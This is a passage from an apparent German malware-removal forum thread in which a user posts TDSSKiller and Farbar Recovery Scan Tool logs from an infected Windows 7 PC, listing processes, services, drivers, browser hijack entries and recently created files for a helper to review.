16:43:40.0844 0x0dd0  [ A9E07F9D7CFB4355176C12A7A1F88C3D ] \Device\Harddisk1\DR1\Partition1
16:43:40.0844 0x0dd0  \Device\Harddisk1\DR1\Partition1 - ok
16:43:40.0844 0x0dd0  [ A30A3119BCC3D928363439590CFABBB0 ] \Device\Harddisk0\DR0\Partition1
16:43:40.0844 0x0dd0  \Device\Harddisk0\DR0\Partition1 - ok
16:43:40.0844 0x0dd0  [ 80E50B9E2E830690DFA905D2A37F08DB ] \Device\Harddisk0\DR0\Partition2
16:43:40.0844 0x0dd0  \Device\Harddisk0\DR0\Partition2 - ok
16:43:40.0844 0x0dd0  [ AEBCE5196EAA3B5AA44AC6B1CA0055FF ] \Device\Harddisk2\DR2\Partition1
16:43:40.0844 0x0dd0  \Device\Harddisk2\DR2\Partition1 - ok
16:43:40.0844 0x0dd0  ================ Scan generic autorun ======================
16:43:40.0860 0x0dd0  [ 258E2CD2C4984A977106C9EF7CA8AF69, D8F6409D5F5782CC27D159D18E914A3DB59D8644D7017CA6F84F0CF30E95174C ] C:\Program Files (x86)\Avira\Launcher\Avira.SystrayStartTrigger.exe
16:43:40.0860 0x0dd0  Avira SystrayStartTrigger - ok
16:43:40.0875 0x0dd0  [ 1BC31F797516DC7B7446B62A849D5905, 49B35A41F1C3739800CBA2A559C2AEFE89FBC090F8305681AF3B379B639E16AA ] C:\Program Files (x86)\Avira\Antivirus\avgnt.exe
16:43:40.0891 0x0dd0  avgnt - ok
16:43:40.0891 0x0dd0  [ DAAACF8A57FEF7171BD47FF703855AEC, EC6E1847B8D70A8805C94A5B25AE5E84866B43D8D12AB9909C8E315DC45A2597 ] C:\Program Files (x86)\Raptr Inc\Raptr\raptrstub.exe
16:43:40.0907 0x0dd0  Raptr - ok
16:43:40.0922 0x0dd0  [ 1E035B53EC79EFDA1227BF9EF690799C, E2BC39793EB829AEB3D48D7DD5A3EC6EA151491464744852CD0C27875305390E ] C:\Program Files (x86)\avmwlanstick\FRITZWLANMini.exe
16:43:40.0938 0x0dd0  AVMWlanClient - ok
16:43:40.0938 0x0dd0  [ 09EB6FF675B6B4D343679F340AAC1B6A, FDCEDC5DD58FE951EF454D0DE44723551060E2000DA688973536A29036654BD2 ] C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe
16:43:40.0938 0x0dd0  AvgUi - ok
16:43:40.0938 0x0dd0  DiskPower - ok
16:43:40.0969 0x0dd0  [ DCCA4B04AF87E52EF9EAA2190E06CBAC, 8858CFD159BB32AE9FCCA1A79EA83C876D481A286E914071D48F42FCA5B343D8 ] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe
16:43:40.0985 0x0dd0  Sidebar - ok
16:43:41.0000 0x0dd0  [ 0FA760BF380B08D0B67B5507CD8B32AA, 0F73A7F64C4FDAB98CD3A865CC54B3A7195761530FCB115B725CC5A9FB738739 ] C:\Windows\System32\mctadmin.exe
16:43:41.0000 0x0dd0  mctadmin - ok
16:43:41.0016 0x0dd0  [ DCCA4B04AF87E52EF9EAA2190E06CBAC, 8858CFD159BB32AE9FCCA1A79EA83C876D481A286E914071D48F42FCA5B343D8 ] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe
16:43:41.0031 0x0dd0  Sidebar - ok
16:43:41.0047 0x0dd0  [ 0FA760BF380B08D0B67B5507CD8B32AA, 0F73A7F64C4FDAB98CD3A865CC54B3A7195761530FCB115B725CC5A9FB738739 ] C:\Windows\System32\mctadmin.exe
16:43:41.0047 0x0dd0  mctadmin - ok
16:43:41.0047 0x0dd0  Steam - ok
16:43:41.0047 0x0dd0  [ CC436BB2A26391F3DEBE316F6FB0474F, 2DA63827AD1449CA5F2888ADFA9645F1EAF8B39D26EC214441EE80F3A56E6E72 ] C:\Users\Dominik\AppData\Local\Microsoft\BingSvc\BingSvc.exe
16:43:41.0047 0x0dd0  BingSvc - ok
16:43:41.0063 0x0dd0  RWSMSDD0KW - ok
16:43:41.0063 0x0dd0  4IGEHZ47Q2 - ok
16:43:41.0063 0x0dd0  8JTWQ6V9KI - ok
16:43:41.0063 0x0dd0  IO0JTZT814 - ok
16:43:41.0063 0x0dd0  YlPack - ok
16:43:41.0063 0x0dd0  JHF82ONEEJ - ok
16:43:41.0063 0x0dd0  FG2WF9QDAN - ok
16:43:41.0063 0x0dd0  MI84H8NRMW - ok
16:43:41.0063 0x0dd0  TG76TVZ2R1 - ok
16:43:41.0063 0x0dd0  YRCPZ90UR7 - ok
16:43:41.0063 0x0dd0  DLE0J3I15F - ok
16:43:41.0063 0x0dd0  PO96OB1AXQ - ok
16:43:41.0063 0x0dd0  77GQPWS9BU - ok
16:43:41.0063 0x0dd0  XTEC8CP1ZV - ok
16:43:41.0078 0x0dd0  PIE3FT9Y7T - ok
16:43:41.0078 0x0dd0  Waiting for KSN requests completion. In queue: 98
16:43:42.0108 0x0dd0  AV detected via SS2: Avira Antivirus, C:\Program Files (x86)\Avira\Antivirus\wsctool.exe ( 15.0.24.143 ), 0x41000 ( enabled : updated )
16:43:42.0108 0x0dd0  Win FW state via NFP2: enabled ( trusted )
16:43:42.0217 0x0dd0  ============================================================
16:43:42.0217 0x0dd0  Scan finished
16:43:42.0217 0x0dd0  ============================================================
16:43:42.0217 0x0334  Detected object count: 0
16:43:42.0217 0x0334  Actual detected object count: 0

M-K-D-B · 11.03.2017, 23:47

Hinweis 6. nochmal lesen und entsprechend ausführen.

AresInvicta · 12.03.2017, 01:03

Hm komisch, habe eigentlich als Admin ausgeführt aber das Konto war nichtmal aktiviert.
Hoffe jetzt passt es..

FRST:

Code:

ATTFilter

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 11-03-2017 01
durchgeführt von Administrator (Administrator) auf DOMINIK-PC (12-03-2017 00:50:16)
Gestartet von C:\Users\Administrator\Desktop
Geladene Profile: Administrator (Verfügbare Profile: Dominik & Administrator)
Platform: Windows 7 Enterprise Service Pack 1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Chrome)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\sched.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Service.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avguard.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
() C:\ProgramData\PrefsSecure\Nettrans.exe
() C:\Windows\SysWOW64\NetUtils2016.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler64.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avshadow.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avgnt.exe
(AVM Berlin) C:\Program Files (x86)\avmwlanstick\FRITZWLANMini.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
(Raptr, Inc) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe
(Raptr, Inc) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe
(Raptr Inc.) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_ep64.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM-x32\...\Run: [Avira SystrayStartTrigger] => C:\Program Files (x86)\Avira\Launcher\Avira.SystrayStartTrigger.exe [61896 2016-12-29] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\Antivirus\avgnt.exe [917576 2017-02-05] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [Raptr] => C:\Program Files (x86)\Raptr Inc\Raptr\raptrstub.exe [58640 2016-07-21] (Raptr, Inc)
HKLM-x32\...\Run: [AVMWlanClient] => C:\Program Files (x86)\avmwlanstick\FRITZWLANMini.exe [937984 2015-10-01] (AVM Berlin)
HKLM-x32\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe [240400 2016-12-06] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [DiskPower] => "C:\Program Files (x86)\DiskP\DiskPower.exe"
HKLM\...\Providers\2u1ym8ia: C:\Program Files (x86)\Ckerctyjolely Server\local64spl.dll [307200 2017-03-06] ()
ShellExecuteHooks: Kein Name - {EA4320F0-FFD8-11E6-B9E5-64006A5CFC23} - C:\Users\Dominik\AppData\Roaming\Leciryatiqt\Tajtion.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  -> Keine Datei
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} =>  -> Keine Datei
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} =>  -> Keine Datei
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  -> Keine Datei
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} =>  -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} =>  -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  -> Keine Datei
GroupPolicy: Beschränkung - Chrome <======= ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Winsock: Catalog5-x64 05 C:\Windows\system32\NSBlockA.dll => Keine Datei 
Winsock: Catalog5-x64 08 C:\Windows\system32\NSBlockB.dll => Keine Datei 
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{0BFB6CE6-9CEE-4108-AEF1-66C2DEF302EF}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{F2E01466-A90A-43BA-8FDE-04D76D4285E3}: [DhcpNameServer] 192.168.2.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#/?show_is=1&source=art
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = 
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxkOOmCCYjHgvUD9jsjsmts9yAy4GDm7Z-V7cDPvaR4LGsu3Ap6WlxmMXUn78SF5t6BBwVBNyQOAEmD118wlstqhGdQr4Qh_N-gDgRjgv-aXcOdrrlnJjataOX458js6cOqsmiiqzHTNoaB1j0amMX574haAeq9Ow4pNyrow,&q={searchTerms}
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-03-06] (Microsoft Corporation)
BHO: Kein Name -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> Keine Datei
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\URLREDIR.DLL [2017-03-06] (Microsoft Corporation)
BHO: Kein Name -> {C654F3FE-8E84-4BB7-87CF-8D9171FC3C73} -> Keine Datei
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-03-06] (Microsoft Corporation)
BHO-x32: Kein Name -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> Keine Datei
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\URLREDIR.DLL [2017-03-06] (Microsoft Corporation)
BHO-x32: AviraBrowserSafety.BrowserSafety -> {c3c77255-42c0-499f-b664-6e981a0b1647} -> C:\Windows\system32\mscoree.dll [2010-11-21] (Microsoft Corporation)
BHO-x32: Kein Name -> {C654F3FE-8E84-4BB7-87CF-8D9171FC3C73} -> Keine Datei
Handler-x32: abs - {E00957BD-D0E1-4eb9-A025-7743FDC8B27B} - C:\Windows\system32\mscoree.dll [2010-11-21] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Filter: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter-x32: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter-x32: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF HKLM-x32\...\Firefox\Extensions: [@ultimateshoppingsearch] - C:\Users\Dominik\AppData\Roaming\Mozilla\Firefox\Profiles\906yBQwi.default\extensions\@ultimateshoppingsearch.xpi => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [{0E260C16-0B27-4A57-9099-4FD00DD1E97E}] - C:\Windows\Installer\{A27C8C1E-0B6E-4B31-8470-295F3B658157}\{0E260C16-0B27-4A57-9099-4FD00DD1E97E}.xpi
FF Extension: (&#x2063;) - C:\Windows\Installer\{A27C8C1E-0B6E-4B31-8470-295F3B658157}\{0E260C16-0B27-4A57-9099-4FD00DD1E97E}.xpi [2017-03-06]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-03-06] (Microsoft Corporation)
StartMenuInternet: FIREFOX.EXE - firefox.exe

Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [edbmobghbfpobjijpbkahojamahhjhgo] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [eiibddcohpjhajbnfkpboacmohommppp] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AMD FUEL Service; C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Service.exe [351944 2015-11-13] (Advanced Micro Devices, Inc.)
S2 AntiVirMailService; C:\Program Files (x86)\Avira\Antivirus\avmailc7.exe [1089592 2017-02-05] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\Antivirus\sched.exe [476736 2017-02-05] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\Antivirus\avguard.exe [476736 2017-02-05] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\Antivirus\avwebg7.exe [1490296 2017-02-05] (Avira Operations GmbH & Co. KG)
S2 avgsvc; C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [1146128 2016-12-06] (AVG Technologies CZ, s.r.o.)
R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [372272 2016-12-29] (Avira Operations GmbH & Co. KG)
S4 AvmSwitchUsb; C:\Program Files (x86)\avmwlanstick\AVMSwitchUsb.exe [125440 2015-10-01] () [Datei ist nicht signiert]
S3 BstHdAndroidSvc; C:\Program Files (x86)\Bluestacks\HD-Service.exe [445976 2016-08-11] (BlueStack Systems, Inc.)
R2 BstHdLogRotatorSvc; C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe [425496 2016-08-11] (BlueStack Systems, Inc.)
S3 BstHdPlusAndroidSvc; C:\Program Files (x86)\Bluestacks\HD-Plus-Service.exe [462360 2016-08-11] (BlueStack Systems, Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3704520 2017-02-18] (Microsoft Corporation)
R2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [43520 2017-03-06] () [Datei ist nicht signiert]
R2 NetUtils2016srv; C:\Windows\SysWOW64\NetUtils2016.exe [470592 2017-03-06] ()
S2 PlaysService; C:\Program Files (x86)\Raptr Inc\PlaysTV\plays_service.exe [32528 2016-06-07] (Plays.tv, LLC)
S2 PrefersSecure; C:\ProgramData\PrefersSecure\Nettrans.exe [44544 2017-03-02] () [Datei ist nicht signiert]
S3 VSStandardCollectorService140; F:\Program Files\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [108776 2016-07-17] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S2 backlh; C:\ProgramData\Logic Cramble\set.exe [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AODDriver4.3; C:\Program Files\AMD\ATI.ACE\Fuel\amd64\AODDriver2.sys [59616 2014-02-11] (Advanced Micro Devices)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [176464 2017-02-05] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [148032 2017-02-05] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2016-04-04] (Avira Operations GmbH & Co. KG)
S3 avmeject; C:\Windows\System32\drivers\avmeject.sys [14120 2015-10-01] (AVM Berlin)
R2 avnetflt; C:\Windows\System32\DRIVERS\avnetflt.sys [79696 2016-04-04] (Avira Operations GmbH & Co. KG)
S3 BstHdDrv; C:\Program Files (x86)\Bluestacks\HD-Hypervisor-amd64.sys [152672 2016-08-11] (BlueStack Systems)
S3 BstkDrv; C:\Program Files (x86)\Bluestacks\BstkDrv.sys [307768 2016-07-28] (Bluestack System Inc. )
R3 fwlanusb6_860; C:\Windows\System32\DRIVERS\fwlanusb6_860.sys [2274336 2015-10-01] (AVM GmbH)
R1 NetUtils2016; C:\Windows\system32\drivers\NetUtils2016.sys [909944 2017-03-06] () <==== ACHTUNG
R1 VBoxUSBMon; C:\Windows\System32\DRIVERS\VBoxUSBMon.sys [127432 2015-09-16] (BigNox Corporation)
R1 XQHDrv; C:\Windows\System32\DRIVERS\XQHDrv.sys [253384 2015-09-16] (BigNox Corporation)
R1 XQHDrv; C:\Windows\SysWOW64\DRIVERS\XQHDrv.sys [253384 2015-09-16] (BigNox Corporation)
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-03-12 00:50 - 2017-03-12 00:50 - 00015887 _____ C:\Users\Administrator\Desktop\FRST.txt
2017-03-12 00:50 - 2017-03-12 00:41 - 02424320 _____ (Farbar) C:\Users\Administrator\Desktop\FRST64.exe
2017-03-12 00:50 - 2017-03-11 16:37 - 04747704 _____ (AO Kaspersky Lab) C:\Users\Administrator\Desktop\tdsskiller.exe
2017-03-12 00:48 - 2017-03-12 00:49 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Raptr
2017-03-12 00:48 - 2017-03-12 00:48 - 00112320 _____ C:\Users\Administrator\AppData\Local\GDIPFONTCACHEV1.DAT
2017-03-12 00:48 - 2017-03-12 00:48 - 00001421 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2017-03-12 00:48 - 2017-03-12 00:48 - 00000020 ___SH C:\Users\Administrator\ntuser.ini
2017-03-12 00:48 - 2017-03-12 00:48 - 00000000 _SHDL C:\Users\Administrator\Vorlagen
2017-03-12 00:48 - 2017-03-12 00:48 - 00000000 _SHDL C:\Users\Administrator\Startmenü
2017-03-12 00:48 - 2017-03-12 00:48 - 00000000 _SHDL C:\Users\Administrator\Netzwerkumgebung
2017-03-12 00:48 - 2017-03-12 00:48 - 00000000 _SHDL C:\Users\Administrator\Lokale Einstellungen
2017-03-12 00:48 - 2017-03-12 00:48 - 00000000 _SHDL C:\Users\Administrator\Eigene Dateien
2017-03-12 00:48 - 2017-03-12 00:48 - 00000000 _SHDL C:\Users\Administrator\Druckumgebung
2017-03-12 00:48 - 2017-03-12 00:48 - 00000000 _SHDL C:\Users\Administrator\Documents\Eigene Videos
2017-03-12 00:48 - 2017-03-12 00:48 - 00000000 _SHDL C:\Users\Administrator\Documents\Eigene Musik
2017-03-12 00:48 - 2017-03-12 00:48 - 00000000 _SHDL C:\Users\Administrator\Documents\Eigene Bilder
2017-03-12 00:48 - 2017-03-12 00:48 - 00000000 _SHDL C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2017-03-12 00:48 - 2017-03-12 00:48 - 00000000 _SHDL C:\Users\Administrator\AppData\Local\Verlauf
2017-03-12 00:48 - 2017-03-12 00:48 - 00000000 _SHDL C:\Users\Administrator\AppData\Local\Anwendungsdaten
2017-03-12 00:48 - 2017-03-12 00:48 - 00000000 _SHDL C:\Users\Administrator\Anwendungsdaten
2017-03-12 00:48 - 2017-03-12 00:48 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\PlaysTV
2017-03-12 00:48 - 2017-03-12 00:48 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\library_dir
2017-03-12 00:48 - 2017-03-12 00:48 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Adobe
2017-03-12 00:48 - 2017-03-12 00:48 - 00000000 ____D C:\Users\Administrator\AppData\Local\Google
2017-03-12 00:48 - 2017-03-12 00:48 - 00000000 ____D C:\Users\Administrator
2017-03-12 00:48 - 2016-07-04 08:43 - 00002124 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft OneDrive.lnk
2017-03-12 00:48 - 2011-04-12 09:21 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Media Center Programs
2017-03-11 17:08 - 2017-03-11 17:08 - 00000000 ___DL C:\Users\Dominik\AppData\LocalLow\PlayReady
2017-03-11 16:43 - 2017-03-11 17:13 - 00206036 _____ C:\TDSSKiller.3.1.0.12_11.03.2017_16.43.23_log.txt
2017-03-11 16:39 - 2017-03-12 00:50 - 00000000 ____D C:\FRST
2017-03-11 15:21 - 2017-03-11 15:21 - 00000000 ____D C:\Windows\LastGood
2017-03-11 15:20 - 2017-03-11 15:20 - 00000000 ____D C:\Program Files (x86)\InstallShield Installation Information
2017-03-11 15:20 - 2017-03-11 15:20 - 00000000 ____D C:\Program Files (x86)\Etron Technology
2017-03-11 15:20 - 2013-08-05 16:37 - 00094208 _____ (Etron Technology Inc) C:\Windows\system32\Drivers\EtronXHCI.sys
2017-03-11 15:20 - 2013-08-05 16:37 - 00065408 _____ (Etron Technology Inc) C:\Windows\system32\Drivers\EtronHub3.sys
2017-03-11 13:21 - 2017-03-11 13:21 - 00000000 ____D C:\Users\Dominik\AppData\Local\ElevatedDiagnostics
2017-03-11 13:20 - 2017-03-11 13:20 - 00099988 _____ C:\Windows\ntbtlog.txt
2017-03-11 13:14 - 2017-03-11 13:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2017-03-11 13:14 - 2017-03-11 13:14 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2017-03-11 13:14 - 2017-03-11 13:14 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2017-03-09 20:46 - 2017-03-09 20:46 - 00040304 _____ (Greatis Software) C:\Windows\SysWOW64\Drivers\Partizan.sys
2017-03-09 20:41 - 2017-03-09 20:41 - 00000000 ____D C:\@RestoreQuarantine
2017-03-09 20:36 - 2017-03-09 20:36 - 00000000 ____D C:\ProgramData\RegRun
2017-03-09 20:35 - 2017-03-09 20:52 - 00000000 ____D C:\Users\Public\Documents\regruninfo
2017-03-07 19:32 - 2017-03-09 20:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2017-03-06 20:54 - 2017-03-06 20:54 - 00000000 ____D C:\Users\Dominik\AppData\LocalLow\Adobe
2017-03-06 20:34 - 2017-03-06 20:54 - 00000000 ____D C:\Users\Dominik\AppData\Local\Adobe
2017-03-06 20:34 - 2017-03-06 20:54 - 00000000 ____D C:\ProgramData\Adobe
2017-03-06 20:34 - 2017-03-06 20:34 - 00000000 ____D C:\Program Files (x86)\Adobe
